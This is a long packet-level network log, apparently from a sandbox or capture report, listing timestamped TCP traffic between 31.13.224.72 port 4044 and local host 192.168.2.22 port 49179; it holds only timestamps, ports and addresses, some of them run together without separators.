                                                                                                                                                                                  Dec 3, 2024 14:01:47.440551043 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.440601110 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.442969084 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.443056107 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.443146944 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.444920063 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.445179939 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.445307016 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.446963072 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.447081089 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.447143078 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.448405981 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.448592901 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.448632002 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.449826956 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.449956894 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.450027943 CET491794044192.168.2.2231.13.224.72
Timestamp                           Source Port  Dest Port  Source IP      Dest IP
Dec 3, 2024 14:01:47.451162100 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.451225042 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.451332092 CET  49179        4044       192.168.2.22   31.13.224.72
Dec 3, 2024 14:01:47.452697992 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.452786922 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.452856064 CET  49179        4044       192.168.2.22   31.13.224.72
Dec 3, 2024 14:01:47.454365969 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.454477072 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.454582930 CET  49179        4044       192.168.2.22   31.13.224.72
Dec 3, 2024 14:01:47.455909014 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.455976963 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.456057072 CET  49179        4044       192.168.2.22   31.13.224.72
Dec 3, 2024 14:01:47.457465887 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.457585096 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.457703114 CET  49179        4044       192.168.2.22   31.13.224.72
Dec 3, 2024 14:01:47.459076881 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.459192991 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.459253073 CET  49179        4044       192.168.2.22   31.13.224.72
Dec 3, 2024 14:01:47.460704088 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.460812092 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.460892916 CET  49179        4044       192.168.2.22   31.13.224.72
Dec 3, 2024 14:01:47.462302923 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.462460041 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.462529898 CET  49179        4044       192.168.2.22   31.13.224.72
Dec 3, 2024 14:01:47.463871002 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.464040995 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.464164019 CET  49179        4044       192.168.2.22   31.13.224.72
Dec 3, 2024 14:01:47.465459108 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.465581894 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.465655088 CET  49179        4044       192.168.2.22   31.13.224.72
Dec 3, 2024 14:01:47.467006922 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.467053890 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.467122078 CET  49179        4044       192.168.2.22   31.13.224.72
Dec 3, 2024 14:01:47.468559027 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.468658924 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.468714952 CET  49179        4044       192.168.2.22   31.13.224.72
Dec 3, 2024 14:01:47.470160007 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.470427990 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.470474005 CET  49179        4044       192.168.2.22   31.13.224.72
Dec 3, 2024 14:01:47.471661091 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.471791029 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.471837997 CET  49179        4044       192.168.2.22   31.13.224.72
Dec 3, 2024 14:01:47.473287106 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.473351955 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.473411083 CET  49179        4044       192.168.2.22   31.13.224.72
Dec 3, 2024 14:01:47.474773884 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.474859953 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.474915981 CET  49179        4044       192.168.2.22   31.13.224.72
Dec 3, 2024 14:01:47.476300955 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.476489067 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.476532936 CET  49179        4044       192.168.2.22   31.13.224.72
Dec 3, 2024 14:01:47.477852106 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.477948904 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.478003979 CET  49179        4044       192.168.2.22   31.13.224.72
Dec 3, 2024 14:01:47.479402065 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.479516029 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.479561090 CET  49179        4044       192.168.2.22   31.13.224.72
Dec 3, 2024 14:01:47.480990887 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.481065989 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.481146097 CET  49179        4044       192.168.2.22   31.13.224.72
Dec 3, 2024 14:01:47.482496977 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.482572079 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.482614040 CET  49179        4044       192.168.2.22   31.13.224.72
Dec 3, 2024 14:01:47.484054089 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.484199047 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.484287024 CET  49179        4044       192.168.2.22   31.13.224.72
Dec 3, 2024 14:01:47.485812902 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.485934019 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.485977888 CET  49179        4044       192.168.2.22   31.13.224.72
Dec 3, 2024 14:01:47.487200975 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.487221956 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.487265110 CET  49179        4044       192.168.2.22   31.13.224.72
Dec 3, 2024 14:01:47.488682985 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.488749981 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.488857985 CET  49179        4044       192.168.2.22   31.13.224.72
Dec 3, 2024 14:01:47.490314007 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.490405083 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.490452051 CET  49179        4044       192.168.2.22   31.13.224.72
Dec 3, 2024 14:01:47.491802931 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.491961002 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.492053986 CET  49179        4044       192.168.2.22   31.13.224.72
Dec 3, 2024 14:01:47.493319988 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.493505001 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.493587017 CET  49179        4044       192.168.2.22   31.13.224.72
Dec 3, 2024 14:01:47.494854927 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.497889996 CET  49179        4044       192.168.2.22   31.13.224.72
Dec 3, 2024 14:01:47.500055075 CET  49179        4044       192.168.2.22   31.13.224.72
Dec 3, 2024 14:01:47.598001003 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.598028898 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.598129034 CET  49179        4044       192.168.2.22   31.13.224.72
Dec 3, 2024 14:01:47.598560095 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.598849058 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.598912001 CET  49179        4044       192.168.2.22   31.13.224.72
Dec 3, 2024 14:01:47.599112034 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.599889040 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.599935055 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.599936962 CET  49179        4044       192.168.2.22   31.13.224.72
Dec 3, 2024 14:01:47.600939989 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.600982904 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.601020098 CET  49179        4044       192.168.2.22   31.13.224.72
Dec 3, 2024 14:01:47.602020025 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.602077961 CET  49179        4044       192.168.2.22   31.13.224.72
Dec 3, 2024 14:01:47.602138042 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.603229046 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.603302956 CET  49179        4044       192.168.2.22   31.13.224.72
Dec 3, 2024 14:01:47.603341103 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.604222059 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.604283094 CET  49179        4044       192.168.2.22   31.13.224.72
Dec 3, 2024 14:01:47.604298115 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.605281115 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.605349064 CET  49179        4044       192.168.2.22   31.13.224.72
Dec 3, 2024 14:01:47.605446100 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.606348991 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.606416941 CET  49179        4044       192.168.2.22   31.13.224.72
Dec 3, 2024 14:01:47.606461048 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.607382059 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.607428074 CET  49179        4044       192.168.2.22   31.13.224.72
Dec 3, 2024 14:01:47.607450962 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.608375072 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.608445883 CET  49179        4044       192.168.2.22   31.13.224.72
Dec 3, 2024 14:01:47.608470917 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.609414101 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.609457970 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.609477043 CET  49179        4044       192.168.2.22   31.13.224.72
Dec 3, 2024 14:01:47.610491037 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.610552073 CET  49179        4044       192.168.2.22   31.13.224.72
Dec 3, 2024 14:01:47.610610962 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.611501932 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.611545086 CET  49179        4044       192.168.2.22   31.13.224.72
Dec 3, 2024 14:01:47.611581087 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.612495899 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.612576008 CET  49179        4044       192.168.2.22   31.13.224.72
Dec 3, 2024 14:01:47.612634897 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.613500118 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.613554955 CET  49179        4044       192.168.2.22   31.13.224.72
Dec 3, 2024 14:01:47.613574982 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.614557028 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.614607096 CET  49179        4044       192.168.2.22   31.13.224.72
Dec 3, 2024 14:01:47.614713907 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.615655899 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.615727901 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.615735054 CET  49179        4044       192.168.2.22   31.13.224.72
Dec 3, 2024 14:01:47.616581917 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.616631985 CET  49179        4044       192.168.2.22   31.13.224.72
Dec 3, 2024 14:01:47.616734982 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.617518902 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.617578030 CET  49179        4044       192.168.2.22   31.13.224.72
Dec 3, 2024 14:01:47.617758036 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.618597984 CET  4044         49179      31.13.224.72   192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.618628025 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.618659019 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.619517088 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.619564056 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.619688034 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.620587111 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.620632887 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.620696068 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.621484995 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.621563911 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.621567011 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.622639894 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.622703075 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.622788906 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.623620033 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.623747110 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.623753071 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.624784946 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.624876022 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.625169992 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.625905037 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.625962973 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.625988007 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.626893997 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.626962900 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.627043009 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.627810001 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.627856970 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.627923012 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.628772974 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.628824949 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.628854990 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.629482985 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.629559040 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.629622936 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.630275011 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.630331993 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.630398035 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.631546021 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.631598949 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.631710052 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.632523060 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.632575989 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.632597923 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.633279085 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.633333921 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.633352041 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.634202957 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.634258986 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.634387016 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.635181904 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.635263920 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.635287046 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.636183977 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.636235952 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.636269093 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.637192011 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.637239933 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.637367964 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.638138056 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.638214111 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.638236046 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.639105082 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.639148951 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.639235020 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.640088081 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.640125990 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.640244961 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.641088963 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.641138077 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.641285896 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.642066002 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.642133951 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.642153978 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.643075943 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.643155098 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.643166065 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.644025087 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.644069910 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.644134998 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.645015955 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.645076990 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.645106077 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.646189928 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.646249056 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.646387100 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.647063017 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.647106886 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.647200108 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.647988081 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.648026943 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.648040056 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.648983955 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.649036884 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.649090052 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.649985075 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.650029898 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.650055885 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.799381018 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.799475908 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.799612045 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.799951077 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.800008059 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.800052881 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.800828934 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.800890923 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.800930023 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.801786900 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.801816940 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.801832914 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.802769899 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.802851915 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.802892923 CET40444917931.13.224.72192.168.2.22
Timestamp                           Source Port  Dest Port  Source IP      Dest IP
Dec 3, 2024 14:01:47.803744078 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.803792000 CET  49179        4044       192.168.2.22   31.13.224.72
Dec 3, 2024 14:01:47.803837061 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.804747105 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.804841042 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.804862976 CET  49179        4044       192.168.2.22   31.13.224.72
Dec 3, 2024 14:01:47.805721045 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.805815935 CET  49179        4044       192.168.2.22   31.13.224.72
Dec 3, 2024 14:01:47.805846930 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.806703091 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.806766033 CET  49179        4044       192.168.2.22   31.13.224.72
Dec 3, 2024 14:01:47.806806087 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.807698965 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.807764053 CET  49179        4044       192.168.2.22   31.13.224.72
Dec 3, 2024 14:01:47.807801962 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.808696032 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.808741093 CET  49179        4044       192.168.2.22   31.13.224.72
Dec 3, 2024 14:01:47.808834076 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.809648991 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.809705019 CET  49179        4044       192.168.2.22   31.13.224.72
Dec 3, 2024 14:01:47.809732914 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.810709000 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.810790062 CET  49179        4044       192.168.2.22   31.13.224.72
Dec 3, 2024 14:01:47.810859919 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.811646938 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.811697960 CET  49179        4044       192.168.2.22   31.13.224.72
Dec 3, 2024 14:01:47.811795950 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.812669992 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.812716007 CET  49179        4044       192.168.2.22   31.13.224.72
Dec 3, 2024 14:01:47.812846899 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.813663006 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.813724995 CET  49179        4044       192.168.2.22   31.13.224.72
